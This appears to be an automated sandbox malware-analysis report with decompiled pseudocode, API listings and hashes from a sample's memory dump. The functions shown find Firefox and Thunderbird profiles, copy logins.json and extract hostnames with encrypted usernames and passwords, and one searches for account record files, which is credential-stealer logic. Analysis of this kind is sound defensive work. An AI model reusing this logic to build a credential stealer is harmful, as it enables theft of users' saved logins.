                                      0x00439d41
                                      0x00439d4a
                                      0x00439d4f
                                      0x00439d54
                                      0x00439d5e
                                      0x00439d68
                                      0x00439d6e
                                      0x00439d73
                                      0x00439d73
                                      0x00439d79
                                      0x00439d80
                                      0x00439d87
                                      0x00439d8a
                                      0x00439d92
                                      0x00439d95
                                      0x00439d9d
                                      0x00439da2
                                      0x00439da5
                                      0x00439da5
                                      0x00439a52
                                      0x00439a21
                                      0x00439a21
                                      0x00439a24
                                      0x00439a2c
                                      0x00439a2c
                                      0x00439da8
                                      0x00439da8
                                      0x00439dd3
                                      0x00439ddd
                                      0x00439dde
                                      0x00439dde
                                      0x00439de6
                                      0x00439de6
                                      0x00439dee
                                      0x00439df6
                                      0x00439e01

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0043ADFA
                                        • Part of subcall function 0043ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0043AE08
                                        • Part of subcall function 0043ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,004393CF,?,00000104,00000000), ref: 0043AE21
                                        • Part of subcall function 0043ADBE: RegQueryValueExW.ADVAPI32(004393CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0043AE3E
                                        • Part of subcall function 0043ADBE: RegCloseKey.ADVAPI32(004393CF,?,00000104,00000000), ref: 0043AE47
                                      • lstrcatW.KERNEL32(?,\firefox.exe), ref: 00439932
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 00439943
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00439DC3
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043309F: wsprintfW.USER32 ref: 004330BA
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00439ABA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                      • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                      • API String ID: 288196626-815594582
                                      • Opcode ID: 4580d06380d9f67f08ecf01215769d3a714d46447b39f138304f49e8646984f5
                                      • Instruction ID: 366668c8ac2844ee9c71a89ef6ec8087ecec9a416ba350765075c5a28c357167
                                      • Opcode Fuzzy Hash: 4580d06380d9f67f08ecf01215769d3a714d46447b39f138304f49e8646984f5
                                      • Instruction Fuzzy Hash: 3EE13B71A001189BDB04FFA2DD929EEB779AF08308F10616FF11667192EF786E45CB58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043936E, Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0043936E(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E00433412( &_v24, L"Profile");
				_t279 = 0;
				E00431052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E00431052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0043ADBE(L"thunderbird.exe",  &_v704, _t396);
				E00433412( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E0043345A(_t395,  &_v44);
				_t289 = _t385;
				if(E0043A324(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E00433297( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E0043345A( &_v36,  &_a4);
					E00433297( &_v36, _t381, __eflags, L"profiles.ini");
					E00433264( &_v24, E00433412( &_v40, L"Profile"));
					E00435A2D(_v40);
					E0043309F( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E00433264( &_v24, E00433412( &_v60, L"Profile"));
						E00435A2D(_v60);
						_v60 = _t279;
						E0043309F( &_v24, _t381, __eflags, _v56 + 1);
						E0043345A( &_v12,  &_a4);
						E00433297( &_v12, _t381, __eflags,  &_v1224);
						E00433381( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E0043345A( &_v20,  &_v12);
									E00433297( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E0043D75B( &_v16, _t382, __eflags);
									E00433297( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E00433162( &_v16, __eflags, E004332D4( &_v64, _t381, __eflags));
									E00435A2D(_v64);
									_v64 = _t279;
									E00433297( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E00433264( &_v20,  &_v16);
										_t386 = _v20;
									}
									E0043DE6C( &_v184, __eflags);
									_t321 =  &_v180;
									E00433264(_t321,  &_v20);
									_push(_t321);
									_t200 = E0043E130( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0043DDDB( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E004331EC( &_v104, "encryptedUsername");
										_t210 = E00432D59( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E00438B5D(_t210, _t208, __eflags);
										_v108 = _t281;
										E00435A2D(_v160);
										_t332 = _v104;
										E00435A2D(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E004331EC( &_v116, "hostname");
												E00438B96( &_v40, E00432D59( &_v52,  &_v112), __eflags, _t223, _t393);
												E00435A2D(_v112);
												E00435A2D(_v116);
												_t229 = E004331EC( &_v124, "encryptedUsername");
												E00438B96( &_v84, E00432D59( &_v52,  &_v120), __eflags, _t229, _t393);
												E00435A2D(_v120);
												E00435A2D(_v124);
												_t235 = E004331EC( &_v132, "encryptedPassword");
												_t381 = E00432D59( &_v52,  &_v128);
												E00438B96( &_v80, _t237, __eflags, _t235, _t393);
												E00435A2D(_v128);
												E00435A2D(_v132);
												E00439E04(_t387, __eflags, _v84,  &_v136);
												E00439E04(_t387, __eflags, _v80,  &_v144);
												E00433264( &_v100, E00432ECA( &_v40, __eflags,  &_v68));
												E00435A2D(_v68);
												_v68 = 0;
												E00433264( &_v96, E00432ECA(E004331EC( &_v140, _v136), __eflags,  &_v72));
												E00435A2D(_v72);
												_v72 = 0;
												E00435A2D(_v140);
												E00433264( &_v92, E00432ECA(E004331EC( &_v148, _v144), __eflags,  &_v76));
												E00435A2D(_v76);
												_v76 = 0;
												E00435A2D(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E00431EB9(_t395,  &_v100);
												E00431EEF(_t387);
												E00435A2D(_v80);
												E00435A2D(_v84);
												E00435A2D(_v40);
												_t332 =  &_v100;
												E0043138F( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E0043345A(_t395,  &_v16);
											E0043DEA9(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E00432E66( &_v52);
										_t323 =  &_v184;
									}
									E0043DE8B(_t323, __eflags);
									E00435A2D(_t392);
									_v16 = _t279;
									E00435A2D(_t386);
									_v20 = _t279;
									E00435A2D(_v28);
									E00435A2D(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E00435A2D(_v28);
							E00435A2D(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0043A2CD(_t385);
					_t279 = 1;
					__eflags = 1;
					E00435A2D(_v36);
				} else {
					E0043345A(_t395,  &_v44);
					if(E0043A324(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E00435A2D(_v44);
				E00435A2D(_t389);
				E00435A2D(_a4);
				return _t279;
			}




































































                                      0x0043936e
                                      0x0043937a
                                      0x00439384
                                      0x00439387
                                      0x00439391
                                      0x0043939b
                                      0x004393a5
                                      0x004393af
                                      0x004393b7
                                      0x004393bc
                                      0x004393bf
                                      0x004393ca
                                      0x004393da
                                      0x004393ed
                                      0x004393fa
                                      0x004393ff
                                      0x00439408
                                      0x00439429
                                      0x00439431
                                      0x0043943d
                                      0x0043944a
                                      0x00439460
                                      0x00439468
                                      0x00439471
                                      0x00439476
                                      0x00439479
                                      0x0043985f
                                      0x0043985f
                                      0x00439870
                                      0x00439876
                                      0x00439878
                                      0x00000000
                                      0x00000000
                                      0x0043948b
                                      0x00439497
                                      0x0043949f
                                      0x004394a8
                                      0x004394ab
                                      0x004394b7
                                      0x004394c6
                                      0x004394d2
                                      0x004394da
                                      0x004394de
                                      0x004394e0
                                      0x004394f7
                                      0x004394fd
                                      0x00439503
                                      0x00439505
                                      0x00000000
                                      0x00439507
                                      0x0043950b
                                      0x0043950e
                                      0x00439511
                                      0x00439513
                                      0x00000000
                                      0x00439515
                                      0x0043951c
                                      0x00439529
                                      0x00439530
                                      0x00439534
                                      0x00439541
                                      0x00439548
                                      0x00439555
                                      0x0043955d
                                      0x0043956a
                                      0x0043956d
                                      0x00439572
                                      0x00439575
                                      0x00439581
                                      0x00439583
                                      0x0043958c
                                      0x00439591
                                      0x00439591
                                      0x0043959a
                                      0x004395a3
                                      0x004395a9
                                      0x004395ae
                                      0x004395ba
                                      0x004395bf
                                      0x004395c5
                                      0x004395c7
                                      0x004395d7
                                      0x004395db
                                      0x004395de
                                      0x004395eb
                                      0x004395fc
                                      0x00439601
                                      0x00439610
                                      0x00439612
                                      0x00439615
                                      0x0043961a
                                      0x0043961d
                                      0x00439622
                                      0x00439624
                                      0x004397e5
                                      0x004397e5
                                      0x0043962a
                                      0x0043962a
                                      0x0043962d
                                      0x0043962d
                                      0x0043962f
                                      0x00439632
                                      0x0043963b
                                      0x0043963e
                                      0x00439641
                                      0x00439644
                                      0x0043965b
                                      0x00439665
                                      0x0043966d
                                      0x0043967b
                                      0x00439692
                                      0x0043969c
                                      0x004396a4
                                      0x004396b2
                                      0x004396c4
                                      0x004396c9
                                      0x004396d3
                                      0x004396db
                                      0x004396ec
                                      0x004396fd
                                      0x00439712
                                      0x0043971a
                                      0x00439722
                                      0x00439742
                                      0x0043974a
                                      0x00439755
                                      0x00439758
                                      0x0043977d
                                      0x00439785
                                      0x00439790
                                      0x00439793
                                      0x00439798
                                      0x0043979b
                                      0x004397a8
                                      0x004397af
                                      0x004397b7
                                      0x004397bf
                                      0x004397c7
                                      0x004397cc
                                      0x004397cf
                                      0x004397d4
                                      0x004397d4
                                      0x004397d4
                                      0x004397dd
                                      0x004397e0
                                      0x004397e0
                                      0x004397e8
                                      0x004397ee
                                      0x004397f0
                                      0x004397f9
                                      0x004397fe
                                      0x00439803
                                      0x0043980d
                                      0x00439817
                                      0x0043981d
                                      0x00439822
                                      0x00439822
                                      0x00439828
                                      0x0043982f
                                      0x00439836
                                      0x00439839
                                      0x00439841
                                      0x00439844
                                      0x0043984c
                                      0x00439851
                                      0x00439851
                                      0x00439513
                                      0x004394e2
                                      0x004394e2
                                      0x004394e5
                                      0x004394ed
                                      0x004394ed
                                      0x00439854
                                      0x00439857
                                      0x0043985a
                                      0x0043985a
                                      0x00439880
                                      0x0043988a
                                      0x0043988a
                                      0x0043988b
                                      0x0043940a
                                      0x00439411
                                      0x0043941f
                                      0x00000000
                                      0x00439421
                                      0x00439421
                                      0x00439421
                                      0x0043941f
                                      0x00439893
                                      0x0043989a
                                      0x004398a2
                                      0x004398ad

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0043ADFA
                                        • Part of subcall function 0043ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0043AE08
                                        • Part of subcall function 0043ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,004393CF,?,00000104,00000000), ref: 0043AE21
                                        • Part of subcall function 0043ADBE: RegQueryValueExW.ADVAPI32(004393CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0043AE3E
                                        • Part of subcall function 0043ADBE: RegCloseKey.ADVAPI32(004393CF,?,00000104,00000000), ref: 0043AE47
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 004393ED
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043A324: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0043A352
                                        • Part of subcall function 0043A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A35B
                                        • Part of subcall function 0043A324: PathFileExistsW.SHLWAPI(00439406), ref: 0043A449
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00439870
                                        • Part of subcall function 0043A324: PathFileExistsW.SHLWAPI(00439406), ref: 0043A4A5
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A4E4
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A4EF
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A4FA
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A505
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A510
                                        • Part of subcall function 0043A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                      • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                      • API String ID: 1065485167-1863067114
                                      • Opcode ID: 1a0d726d7e52a909ed275847f9cfe30c0bccc9dfa2d220fe99b2b9e34059ce28
                                      • Instruction ID: 53aab778e9848f1c944c78fa4c41d079174917c5f190c629eaef6234bc45c7b2
                                      • Opcode Fuzzy Hash: 1a0d726d7e52a909ed275847f9cfe30c0bccc9dfa2d220fe99b2b9e34059ce28
                                      • Instruction Fuzzy Hash: 8CE12971A001189BDB04FFA2DD929EEB779AF18308F10606FF11667192EF786E45CB58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043BDDC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 89%
                                      			E0043BDDC(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E00435A2D(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E00435A87(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E00433412( &_v12,  *_t91);
						if(E00433075( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E00433264( &_v24, E00433412( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E00435A2D(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E00435A2D(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E00433412( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E00433412(_t119,  *_t112);
										E004320E1(_t92 + 0x40,  &_v12);
									}
									E00435A2D(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0043B81D(_v32, 2);
							E0043B889(_v32);
							_v36 = 1;
							E004310C1(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E00435A2D(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}


























                                      0x0043bde7
                                      0x0043bdf1
                                      0x0043bdf4
                                      0x0043bdf7
                                      0x0043bdfa
                                      0x0043bdfd
                                      0x0043be00
                                      0x0043be09
                                      0x0043be0d
                                      0x0043bebd
                                      0x0043bebd
                                      0x0043bec1
                                      0x0043bec4
                                      0x0043bed0
                                      0x0043bed0
                                      0x0043be16
                                      0x0043be1d
                                      0x0043be20
                                      0x0043be20
                                      0x0043be2a
                                      0x0043be3a
                                      0x0043be40
                                      0x0043be45
                                      0x0043be4c
                                      0x0043be56
                                      0x0043be63
                                      0x0043be6b
                                      0x00000000
                                      0x00000000
                                      0x0043be7b
                                      0x0043be81
                                      0x0043be86
                                      0x00000000
                                      0x00000000
                                      0x0043be88
                                      0x0043be8a
                                      0x0043be94
                                      0x0043bea6
                                      0x0043bed1
                                      0x0043bee3
                                      0x0043beeb
                                      0x0043bef0
                                      0x0043befa
                                      0x0043befe
                                      0x0043bf01
                                      0x0043bf06
                                      0x0043bf0e
                                      0x0043bf51
                                      0x0043bf54
                                      0x0043bf58
                                      0x00000000
                                      0x00000000
                                      0x0043bf5e
                                      0x0043bf6d
                                      0x0043bfaa
                                      0x0043bfaa
                                      0x0043bfab
                                      0x0043bfb0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043bfb2
                                      0x0043bf74
                                      0x0043bf87
                                      0x0043bf8e
                                      0x0043bf96
                                      0x0043bf96
                                      0x0043bf9e
                                      0x0043bfa3
                                      0x0043bfa7
                                      0x00000000
                                      0x0043bfa7
                                      0x00000000
                                      0x0043bf5e
                                      0x0043bf16
                                      0x00000000
                                      0x00000000
                                      0x0043bf1e
                                      0x0043bf24
                                      0x0043bf2a
                                      0x0043bf2d
                                      0x0043bf42
                                      0x0043bf46
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043bf4c
                                      0x0043beab
                                      0x0043beb0
                                      0x0043beb4
                                      0x0043beb7
                                      0x0043bebb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043bebb
                                      0x00000000
                                      0x0043be8a
                                      0x00000000

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0043BE03
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0043BE3A
                                        • Part of subcall function 00435A87: GetProcessHeap.KERNEL32(00000000,?,00432DD7,?,?,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000), ref: 00435A8A
                                        • Part of subcall function 00435A87: RtlAllocateHeap.NTDLL(00000000,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000,?,?,00000000), ref: 00435A91
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0043BE63
                                      • GetLastError.KERNEL32 ref: 0043BE6D
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043BE7B
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0043BF3C
                                      • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0043BF7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                      • String ID: ServicesActive
                                      • API String ID: 899334174-3071072050
                                      • Opcode ID: 2f8e4e9c7b3a6555f6513c99d94bc95428cd8d011cddfa7f5c4d55b36226a90b
                                      • Instruction ID: 8a15f3387315b206559d1dbc8046d0a9313a9e2dc193ac57cd7ff6e9fc5dcace
                                      • Opcode Fuzzy Hash: 2f8e4e9c7b3a6555f6513c99d94bc95428cd8d011cddfa7f5c4d55b36226a90b
                                      • Instruction Fuzzy Hash: 18516071A00219ABDB15EF95CD96BEEB7B8EF0C305F10516AE601B6281DB785E40CF98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00438A9C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00438A9C(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x446698, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x446698,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E0043878B(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}









                                      0x00438abb
                                      0x00438abd
                                      0x00438adc
                                      0x00438af2
                                      0x00438af7
                                      0x00438af9
                                      0x00438b05
                                      0x00438b23
                                      0x00438b32
                                      0x00438b3d
                                      0x00438b3d
                                      0x00438b50
                                      0x00438af9
                                      0x00438b5a

                                      APIs
                                      • GetFullPathNameA.KERNEL32(00446698,00000104,?,00000000), ref: 00438ABD
                                      • PathCombineA.SHLWAPI(?,?,00443510), ref: 00438ADC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00438AEC
                                      • PathCombineA.SHLWAPI(?,00446698,0000002E), ref: 00438B23
                                      • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00438B32
                                        • Part of subcall function 0043878B: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004387A8
                                        • Part of subcall function 0043878B: GetLastError.KERNEL32 ref: 004387B5
                                        • Part of subcall function 0043878B: CloseHandle.KERNEL32(00000000), ref: 004387BC
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00438B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                      • String ID: .$Accounts\Account.rec0
                                      • API String ID: 3873318193-2526347284
                                      • Opcode ID: 779dad72e6231444c9569a291b1b17fa54f0aef0765d1345e780e9135fcf9713
                                      • Instruction ID: f000e80871f9eee1791a6363615349a565a630d05a7d1011d1d22a94db022bdd
